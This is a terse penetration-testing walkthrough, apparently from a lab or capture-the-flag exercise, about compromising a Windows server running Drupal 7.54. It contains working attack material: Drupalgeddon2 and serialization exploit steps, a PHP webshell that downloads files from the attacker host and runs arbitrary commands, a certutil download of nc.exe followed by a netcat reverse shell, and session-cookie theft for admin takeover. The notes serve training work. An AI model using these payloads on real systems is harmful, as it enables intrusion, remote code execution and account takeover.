Drupal
Open-source web content management framework written in PHP
Scan
nmap -sC -sV -oA output 10.x.x.x
80 IIS 7.5 drupal = Windows 2008 R2
135 rpc
49154 rpc
DirBuster found 'rest': /rest/ — 200
http://10.x.x.x ..drupal
drupscan
Works but too old - last updated like 2013
github/tibillys
droopescan
Takes a long time to run
http://$IP/CHANGELOG.txt ..Find Version
http://$IP/robots.txt
droopescan --help
droopescan scan drupal -u 10.x.x.x
version: 7.54 ..Interesting Results
Admin: Login page ..But no exploits
Theme: seven
ctools, libraries,
image module
drupalgeddon (msf)
searchsploit drupal 7.5
drupalgeddon (no msf)
CVE-2018-7600
If you get a 'limited shell' you will need to upload nc.exe and do reverse shell
gem install highline
ruby drupalgeddon2.rb 10.x.x.x
nc -nvlp 4444
certutil -urlcache -split -f http://$MyIP/nc.exe
nc.exe -e cmd.exe $MyIP 4444
Serialization Vulnerability - 41564.php
Search and Download the php exploit
ippsec includes Custom phpCode for:
Uploading and Execution
Requires php-curl
Exploit will download json files that could have secrets
google drupal 7.54 exploits ..found one
searchsploit drupal ..found 7.x
searchsploit -x 41564.php ..view
searchsploit -p 41564.php ..clipboard
mv 41564.php drupal.php ..move/rename
Confirm rest:
http://10.x.x.x/rest_endpoint ..nothing
http://10.x.x.x/rest ..ok
$url = 'http://10.x.x.x/'
$endpoint_path = '/rest_endpoint' ..default/wrong
$endpoint_path = '/rest'; ..found by dirbuster
$phpCode = <<<'EOD'
<?php
if (isset($_REQUEST['fupload'])) {
file_put_contents($_REQUEST['fupload], file_get_contents("http://10.x.x.x:8000/" . $_REQUEST['fupload']));
};
if (isset($_REQUEST['fexec'])) {
echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
};
?>
EOD;
$file= [
'filename' => 'ippsec.php',
'data' => $phpCode
];
Exploit:
> php drupal.php
Json Cookies
Exploit will save json files locally
Check them for details, and session cookies to steal
Create a New Cookie, and you might get Admin
cat user.json ..user/pass
cat session.json ..session/admin/cookie
firefox > cookies manager+ (addon) > New Cookie
cat session.json
session_name = Name: xyz111
session_id = Content: ddddd
<save>
http://10.x.x.x/ ..we are admin!!
Dupal PHP Module
If you can access Drupal:
Enable the PHP Filter
Create an Article that has PHP
Drupal > Modules > PHP Filter (enable) > save
Add Content > Create Article
Title: test
Body: <?php phpinfo(); ?>
Format: PHP Code
Preview ... we have code execution!
Webshell
Use the ippsec phpCode
Execute commands and upload
http://10.x.x.x/ippsec.php?fexec=dir
http://10.x.x.x/ippsec.php?fexec=systeminfo
http://10.x.x.x/ippsec.php?fexec=sc query state=all ..denied
Enumeration
systeminfo will tell us the OS version and Patch level
Hotfix 'N/A' might mean we dont have access, or there are no patches
OS/Patch level will help us with KernelExploit
OS Ver: 6.1.7600 B/A Build 7600
Hotfix: N/A
Kernel Exploit
Last updated
Was this helpful?